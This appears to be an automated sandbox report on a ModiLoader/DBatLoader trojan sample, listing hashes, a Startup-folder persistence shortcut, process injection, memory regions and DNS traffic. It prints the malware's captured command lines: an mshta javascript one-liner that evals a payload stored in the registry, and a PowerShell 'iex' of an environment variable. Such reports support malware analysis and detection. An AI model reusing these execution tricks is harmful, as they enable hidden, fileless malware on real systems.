SHA512 c420f2729ed2edfeeb6dd8567853b259d6f541367d8dc2bc4653ecd8da5979c5d81dd0e9ef1dfe8a07159ea7045b51564cf629aa0b7a72ec06c929f1817fc23b

C:\Users\Admin\AppData\Local\d71742\cc24ba.lnk

MD5 50eb0e8cdcb08fb593309add1f03ecc8
SHA1 5130a8324ab30e3cf18ec17abeb4e3b876b4f84c
SHA256 431f91eb9a44286c5c7c6ba9d1a561e0c667ce2b7ebcaf878da1df3717738385
SHA512 e3a643664158c2e016269f53df575c5697fff1f56458ab62e4f016ab227be74ab94bfad21d5644d5dba81cf9a26ebf8ed254a3011ec759446cdda6ed09806db7

C:\Users\Admin\AppData\Local\d71742\043bcc.c56af49

MD5 557e3797953cc87f31df72def303bb9c
SHA1 c480128e944764caa091ca882ab9546a7fe8599b
SHA256 e9621b68352320d5c569d1f2e946bb19267c333cbf5fbdf2abdeaf6a919919be
SHA512 50e5c65ddfc96a5fe7d8a9c4e7505efc0069a438b3e0e77e69a77d7975fb949388d6b688285ffdc63d35d709294fc1556adf3ab6030213924c476956e49d9dce

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\162913.lnk

MD5 86cd5086f5650df400c0fe2c92e267db
SHA1 499252b52603481b50260e789d18a16ac32f46e9
SHA256 b0d96d1cf0032b31e6a262a615e6b38d3b7ff195ea7134623a43a60f23ddba3a
SHA512 47ba3a960e33befa0e69343cb7cab413ec86fcad4d5961fb6f64737f7033a7ab2626fa360c313982a691f7bdeb3a5951e1747b7be175b9c54fa0e40566e3f7e4

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-08 07:59

Reported

2024-05-08 08:02

Platform

win10v2004-20240419-en

Max time kernel

142s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3772 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe
PID 3932 wrote to memory of 4560 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 4560 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 4560 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\23e8c853177ad64150596de9fb375e62_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:reQWNkN1="YQDUB7oM";fb66=new%20ActiveXObject("WScript.Shell");sP7lg="8hxLb";Dq1i5b=fb66.RegRead("HKLM\\software\\Wow6432Node\\LWI7bIR\\WVHy6l6ay9");VMi7au2="hf";eval(Dq1i5b);ePHIH3="5NzeZHt";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:bojxj

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 48.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

memory/4388-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4388-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4388-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4388-6-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-10-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-9-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-8-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-7-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-11-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4388-12-0x00000000008C0000-0x0000000000996000-memory.dmp

memory/4560-14-0x0000000004C70000-0x0000000004CA6000-memory.dmp

memory/4560-15-0x00000000052E0000-0x0000000005908000-memory.dmp

memory/4560-16-0x0000000005260000-0x0000000005282000-memory.dmp

memory/4560-17-0x0000000005A40000-0x0000000005AA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4f1jmaps.3df.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4560-18-0x0000000005AB0000-0x0000000005B16000-memory.dmp

memory/4560-28-0x0000000005C50000-0x0000000005FA4000-memory.dmp

memory/4560-29-0x0000000005FF0000-0x000000000600E000-memory.dmp

memory/4560-30-0x0000000006030000-0x000000000607C000-memory.dmp

memory/4560-31-0x0000000007720000-0x0000000007D9A000-memory.dmp

memory/4560-32-0x00000000070C0000-0x00000000070DA000-memory.dmp